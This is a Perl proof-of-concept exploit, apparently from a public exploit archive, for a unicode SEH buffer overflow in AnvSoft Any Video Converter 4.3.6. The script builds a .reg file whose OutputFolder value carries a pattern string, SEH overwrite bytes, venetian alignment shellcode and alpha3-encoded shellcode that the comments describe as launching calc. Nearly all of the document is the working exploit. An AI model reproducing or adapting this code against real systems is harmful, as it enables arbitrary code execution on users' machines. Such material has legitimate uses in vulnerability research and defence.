# Exploit Title: AnvSoft Any Video Converter 4.3.6 unicode buffer overflow.
# Software Link: http://www.any-video-converter.com
# Version: 4.3.6
# References: http://www.exploit-db.com/exploits/18717/
#             http://www.vulnerability-lab.com/get_content.php?id=492
# Credits: Vulnerability Research Laboratory Team
# Tested on: Win XP SP3 French
# trigger the bug : generate the .reg file, execute it, and then open the app
# Date: 12/05/2012
# Author: h1ch4m (Hicham Oumounid)
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com
# Big thanks to corelanc0d3r and thanks to all for sharing knowledge

my $file ="poc.reg";

$junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9" .
        "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9" .
		"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9" .
		"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9" .
		"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3";

my $xploit = "Windows Registry Editor Version 5.00\n\n";
$xploit .= "[HKEY_CURRENT_USER\\Software\\AnvSoft\\Any Video Converter Ultimate\\Setting\\Output]\n\"OutputFolder\"=\"";
$xploit .= $junk;           # junk

$xploit .= "\x59\x21";      # next seh = POP ECX + ADD BYTE PTR DS:[ESI],CH
$xploit .= "\x61\x4e";      #      seh = ADD ESP,8 # RETN 04  #  0x004E0061

# The Venetian Shellcode
$xploit .= "\x41";                   # \x00\x41\x00 = ADD BYTE PTR DS:[ECX],AL
$xploit .= "\x58";                   # \x58 = POP EAX
$xploit .= "\x41";                   # \x00\x41\x00 = ADD BYTE PTR DS:[ECX],AL
$xploit .= "\xbb\x1e\x11";           # MOV EBX, 0x10002000
$xploit .= "\xf8";                   # ADD AL,BH
$xploit .= "\x41";                   # \x00\x41\x00 = ADD BYTE PTR DS:[ECX],AL
$xploit .= "\x50";                   # push eax
$xploit .= "\x41";                   # \x00\x41\x00 = ADD BYTE PTR DS:[ECX],AL
$xploit .= "\xc3";                   # ret  

# alpha3 encoded ascii uppercase calc Shellcode, base register = EAX
$xploit .= "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11" .
"AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNK8" .
"I8ZXQXY44MTL4QN6QP2VXVBDOTROCNQPFLVLCOVLVU3JNQNRM37XO2VKKCXNP3VULK" .
"QIEVWTNCFEMIUMNKLL3LEJ4PP9PUN4XCLLGLWLV1KMV5XF6C3JDBJWHMOJW7NMJMQP" .
"87CQKS6O5OKM9OOMQYYGN042WP1GNUJJSKY6X5OWTKM2R5QMD6MKYZITLGV26WZVML" .
"KSUOFZGMPSN8LJVYPPNNMWY8LMMN0K5Y1QL0TI2OINK6NNP7TNLSEPJLRVX2HJLHQL" .
"ZOYLLNVKLMJKRL3SZOULGKRQNKNNSTOQQJ1VU8KQ5ZU5NTHYT6LSJSOLXVNMSMPWLV" .
"D8FP5XFJF4LY8PJEMJHGZQDUNPZURQUMENU6UBYKL2QOYP0QMYCGQUMP731TLMMYRF" .
"F5XUMKW0WPOGMBMB2N42YUMNNLEJL5QUMMVMUGRQ084UUKUSYA";

$xploit .= $junk x 15 ."\"";

open($FILE,">$file");
print $FILE $xploit;
close($FILE);
print "File Created successfully\n";
sleep(1);